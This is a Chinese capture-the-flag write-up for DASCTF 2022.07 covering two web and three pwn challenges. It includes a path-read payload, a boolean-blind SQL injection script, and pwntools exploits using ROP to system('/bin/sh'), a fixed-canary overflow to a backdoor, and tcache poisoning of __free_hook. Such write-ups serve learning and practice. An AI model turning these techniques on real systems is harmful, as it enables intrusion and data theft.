2022 DASCTF2022.07赋能赛 部分web pwn wp

前言:给自己两个大嘴巴子,pwn3,一直在用sendline,呜呜,应该send才可以,呜呜呜,卡在这卡了一下午,在一个地方翻了两次(好几次)车呜呜呜呜呜太菜了我

WEB

Ez to getflag

f12,根据猜测直接查找upload.php

发现有代码

<!--?php
    error_reporting(0);
    session_start();
    require_once('class.php');
    $upload = new Upload();
    $upload--->

查找class.php

f = $_FILES;
        }
        // Stores the uploaded file as ./upload/<md5(client-supplied name)>.png.
        // Only the *name* is hashed, so a later upload with the same original
        // name replaces the earlier file: the existing target is unlinked first
        // (errors silenced by @), then the temp file is moved. The return value
        // of move_uploaded_file() is not checked, so "upload success" is printed
        // even when the move failed. The ".png" suffix is forced here
        // independently of what file_check() accepted.
        function savefile() {  
            $fname = md5($this->f["file"]["name"]).".png"; 
            if(file_exists('./upload/'.$fname)) { 
                @unlink('./upload/'.$fname);
            }
            move_uploaded_file($this->f["file"]["tmp_name"],"upload/" . $fname); 
            echo "upload success! :D"; 
        } 
        // Invoked when the object is used as a string. It reads two properties,
        // fname and fsize, that nothing in the visible class assigns, then
        // echoes $cont->$size -- a property of $cont selected by the *value* of
        // $size -- and returns a fixed marker string.
        // NOTE(review): because the visible code never sets these properties,
        // whatever populates the object controls both the target object and the
        // property name; treat this method as an untrusted-data sink.
        function __toString(){
            $cont = $this->fname;
            $size = $this->fsize;
            echo $cont->$size;
            return 'this_is_upload';
        }
        // Entry point used by upload.php: validate with file_check(), then store
        // with savefile(). Nothing is printed here on rejection; file_check()
        // itself echoes the reason.
        function uploadfile() { 
            if($this->file_check()) { 
                $this->savefile(); 
            } 
        }
        // Gatekeeper before savefile(). Accepts only when (a) the last
        // dot-separated segment of the client-supplied filename is exactly
        // "png" (in_array is case-sensitive here) and (b) the file body matches
        // none of the blocklisted tokens below (case-insensitive regex; tokens
        // such as "file" and "dir" match as bare substrings, so any body
        // containing them is rejected). This is a content blocklist rather than
        // a check that the body actually is an image, and the extension test
        // trusts the client-supplied name; both are the points a reviewer would
        // flag. Returns true on acceptance, false otherwise, echoing the reason.
        function file_check() { 
            $allowed_types = array("png");
            $temp = explode(".",$this->f["file"]["name"]);
            $extension = end($temp); 
            if(empty($extension)) { 
                echo "what are you uploaded? :0";
                return false;
            }
            else{ 
                if(in_array($extension,$allowed_types)) {
                    $filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
                    $f = file_get_contents($this->f["file"]["tmp_name"]);
                    if(preg_match_all($filter,$f)){
                        echo 'what are you doing!! :C';
                        return false;
                    }
                    return true; 
                } 
                else { 
                    echo 'png onlyyy! XP'; 
                    return false; 
                } 
            }
        }
    }
    class Show{
        public $source;
        // Records the caller-supplied path without validation. The
        // scheme/traversal blocklist is applied later in show(); it does not
        // cover plain absolute paths, which is why the writeup's /flag read goes
        // through.
        public function __construct($fname)
        {
            $this->source = $fname;
        }
        public function show()
        {
            if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) {
                die('illegal fname :P');
            } else {
                echo file_get_contents($this->source);
                $src = "data:jpg;base64,".base64_encode(file_get_contents($this->source));
                echo "

继续探索

file.php

<!--?php
    error_reporting(0);
    session_start();
    require_once('class.php');
    $filename = $_GET['f'];
    $show = new Show($filename);
    $show--->

发现可以直接读取文件,尝试读取flag,发现可以读取成功

payload:

http://90330b8d-de6c-4e54-bc6f-6c41ed81dedb.node4.buuoj.cn:81/file.php?f=/flag

DASCTF{5f31248c-b20d-423a-baaa-703fb5c8a0a1}

绝地防御

静态页面,f12,翻找js文件,在js文件找到php文件,是个sql注入布尔类型注入,有waf,前台验证,直接burp抓包即可绕过,我这里直接在网上找个exp脚本进行跑了,跑了好久呜呜

exp:

#coding:utf-8
import requests
def database_len():
    """Infer the length of the current database name by boolean-blind probing.

    Each request appends ``and length(database())>i`` to the ``id`` parameter of
    SUPPERAPI.php; a response containing ``admin`` is treated as "true". The first
    ``i`` for which the page no longer matches is printed as the length and the
    loop stops. Only lengths 1-9 are probed. Side effects only (one HTTP GET per
    candidate plus prints); nothing is returned.

    From the server side this is a monotonically increasing comparison in the
    query string, one request per candidate, from a single client -- the kind of
    sequence request logging and WAF pattern rules are built to spot.
    """
    for i in range(1,10):
        url = '''http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php'''
        payload = '''?id=1 and length(database())>%s''' %i  # format the probe string
        # print(url+payload+'%23')
        r = requests.get(url+payload)
        if 'admin' in r.text:
            print(i)
 
        else:
            #print('false')
            print('database_length:',i)
            break
# Runs at import/script start: the length probes fire before database_name is even defined.
database_len()
 
def database_name():
    """Recover the database name one character per position by boolean-blind probing.

    For each position 1-8 the candidates in the fixed lowercase string are tried
    in order; the first whose ``substr(database(),j,1)='c'`` probe yields a
    response containing ``admin`` is appended to ``name`` and the inner loop
    stops. A position where no candidate matches contributes nothing to ``name``.
    The length found by ``database_len`` is not consulted; the position range is
    hard-coded. Side effects only: one HTTP GET per probe, with the partial name
    printed as it grows and the final name printed at the end.
    """
    name = ''
    for j in range(1,9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = "http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php?id=1 and substr(database(),%d,1)='%s'" %(j,i)
            # print(url+'%23')
            r = requests.get(url)
            if 'admin' in r.text:
                name = name+i
                
                print(name)
                
                break
    print('database_name:',name)


# Second module-level call; runs only after the length probe above has finished.
database_name()

PWN

eyfor

思路:整数溢出+栈溢出,-1就能绕过,然后就是基础rop

exp:

from pwn import *
p=process("./pwn4")
# Rebinds p to the remote service: the local process started on the line above is never driven.
p=remote("node4.buuoj.cn","27756")
elf1=ELF("./pwn4")
# system() is imported by the binary, so its PLT stub is a fixed address and no libc leak is needed.
system=elf1.plt['system']
p.sendlineafter("go\n",'\x00'*0x30)
# Every "message:" prompt is answered with "-1"; per the writeup the negative value gets past a
# size check through integer overflow (not verified here).
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendline('-1')
# Fixed address in the binary, used as the argument word placed before system() in payload2;
# presumably where the "/bin/sh" prefix of the input ends up -- TODO confirm against the binary.
buf=0x6010C0
# payload2: "/bin/sh\0", filler up to the saved return address, then two addresses from the
# binary (roles inferred from position only -- verify in a disassembler), the argument pointer
# and the system() stub. Fixed addresses like these only work because the binary is evidently
# not position-independent, and the overwrite itself relies on there being no stack canary;
# either default compiler hardening would have broken this chain.
payload2='/bin/sh\x00'+'a'*(0x30-8)+'b'*8+p64(0x000000000040063e)+p64(0x0000000000400983)+p64(buf)+p64(system)
# Built but never sent: only payload2 goes over the wire below (leftover from an earlier attempt).
payload='cat flag'+'a'*(0x30-8)+'b'*8+p64(0x4007B7)
sleep(0.5)
p.sendline(payload2)
# Python 2 idiom (raw_input); pauses so a debugger can be attached before interactive().
raw_input()
p.interactive()

MyCanary2

思路:add canary能写成固定的,然后基础栈溢出打后门,leak固定,然后退出返回地址到后门即可

exp:

from pwn import *

p=process('./MyCanary2')
# Rebinds p to the remote service; the local process started on the previous line is never used.
p=remote("node4.buuoj.cn","25051")
def add(code):
    """Menu option 1: send *code* after the "code:" prompt.

    Uses the module-level pwntools tube ``p``; sendline appends a newline to
    *code*, which is fine here because the prompt is line-oriented.
    """
    p.sendlineafter("choice\n",'1')
    p.sendlineafter("code:\n",code)

def leak():
    """Menu option 2. Only the choice is sent; the response is not read or parsed here."""
    p.sendlineafter("choice\n",'2')

# Per the writeup the canary can be made a known constant through "add", so the overflow
# places p32(0x0) where the canary is compared, 8 bytes of frame filler, then two addresses
# from the binary (0x40101a, presumably a ret used for stack alignment; 0x401573, the backdoor
# the writeup names -- confirm both in a disassembler).
add('a'*0x6c+p32(0x0)+'b'*8+p64(0x40101a)+p64(0x401573))
# Option 2 is called once; the writeup says the leak is fixed, so its output is not parsed.
leak()
# Option 3 leaves the menu loop; per the writeup the return from the overflowed frame lands in
# the backdoor. A randomised canary (the normal glibc/compiler behaviour) would stop this.
p.sendlineafter("choice\n",'3')
p.interactive()

compat

思路:能错误使用free,leak出libc基地址,在add有个任意性写,a1&0x80!=0,写个0xff就能过,这里有个点卡了我一下午,就是在使用read写入数据要用send不能用sendline,因为会多一个0a,这里导致我写了0xff,多出一个0a到下个read,就不能利用下面read,给自己两个大嘴巴子,然后绕过检测就可以利用任意写劫持下个chunk,任意写进tc为freehook,就可以rce了,我好菜,!!!!!

exp:

from pwn import *

def add(data,tag):
    """Menu option 1: create an entry; *data* and *tag* are sent with sendafter.

    sendafter (not sendline) matters here: the writeup explains the program reads
    these with raw read() calls, so a trailing "\\n" would be consumed by the
    *next* read and desynchronise the menu. Uses the module-level tube ``p``,
    which is assigned after this definition.
    """
    p.sendlineafter("choice: \n",'1')
    p.sendafter("data: \n",str(data))
    p.sendafter("tag: \n",str(tag))
def show(idx):
    """Menu option 2: print entry *idx*. The output is left in the tube for the caller to read."""
    p.sendlineafter("choice: \n",'2')
    p.sendlineafter("idx: \n",str(idx))
def dele(idx):
    """Menu option 3: free entry *idx* (the writeup notes this free can be "misused")."""
    p.sendlineafter("choice: \n",'3')
    p.sendlineafter("idx: \n",str(idx))
def reset():
    """Menu option 4: reset, presumably the entry index/count -- confirm in the binary."""
    p.sendlineafter("choice: \n",'4')
# Local run only: this script never calls remote(). Note the binary is named "compact" while the
# challenge is called "compat".
p=process("./compact")
# Heap grooming: eight allocations freed in order, two more allocated and freed, then reset.
# Per the writeup the program's free can be misused so that a libc pointer becomes readable;
# the exact bin state is not derivable from the script alone -- confirm in gdb before reusing
# any of the offsets below.
for i in range(8):
    add("jjjj"+str(i),"\x00")

for i in range(8):
    dele(i)
add('j1','\x00')
add('j2','\x00')

dele(0)
dele(1)
reset()
for i in range(7):
    add("jj"+str(i),"\x00")
# Entry 7 starts with eight 'A's so the bytes printed right after them by show(7) are the leak.
add("A"*8,"\x00")
show(7)
p.recvuntil('A'*8)
# Six bytes of the leaked pointer, zero-extended to 8; 0x1ecbe0 is the distance from that pointer
# to the libc base for the challenge's libc build only. (Python 2 script -- see the print below.)
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x1ecbe0
print hex(libc_base)
# Symbols are resolved from the *local* system libc; only valid if it is the same build as the target's.
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# one_gadget-style listing kept by the author as a bare string literal (a no-op statement, not a
# comment); the 0xe3b01 entry is the one used below.
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL


'''
rce=libc_base+0xe3b01
free_hook=libc_base+libc.sym['__free_hook']
# Free everything again and reset before the second phase.
for i in range(8):
    dele(i)

reset()
# Dead duplicate of the loop above, left as a string literal (no effect at runtime).
'''
for i in range(8):
    dele(i)

reset()
'''
add("aaaa","\x00") # 0
add("jsjs","\x00") # 1
# Entry 2: 0x60 zero bytes followed by a fake chunk header (prev_size 0, size 0x91). The tag "\xff"
# satisfies the a1&0x80!=0 check described in the writeup, which unlocks one more raw read; the
# next line answers it with exactly 4 bytes and no newline (see add() on why sendline breaks this).
payload="\x00"*0x60+p64(0)+p64(0x91)
add(payload,"\xff") # 2
p.send("\x00"*3+"\x90")
add("jsjs","\x00") # 3
add("jsjsjs","\x00") # 4
dele(0)
dele(1)
dele(3)
dele(2)
reset()
# Fake-chunk layout: three zero words, a 0x21 size field, a pointer to free_hook+0x90, two zero
# words, a 0x91 size field and free_hook itself. Per the writeup this plants free_hook in the
# tcache so that a later allocation is handed memory at __free_hook.
payload=p64(0)*3+p64(0x21)+p64(free_hook+0x90)+2*p64(0)+p64(0x91)+p64(free_hook)
add(payload,"\x00") # 0
add("aaaaaa","\x00") # 1
# Debugging leftover: gdb.attach() blocks until a debugger attaches and fails where gdb is absent.
gdb.attach(p)
# This allocation is the one that receives the poisoned pointer, so its data lands on __free_hook.
add(p64(rce),'\x00')
gdb.attach(p)
# The free fires the hook. Hardening note: glibc 2.34 and later no longer have __free_hook, so this
# final step depends on the older libc the challenge ships.
dele(4)
reset()
p.interactive()

总结:题不难,就是需要仔细,这俩字仔细基本上每次比赛都提醒自己就是不注意呜呜呜!!!!!!

本文链接:

http://blog.azly.top/index.php/archives/80/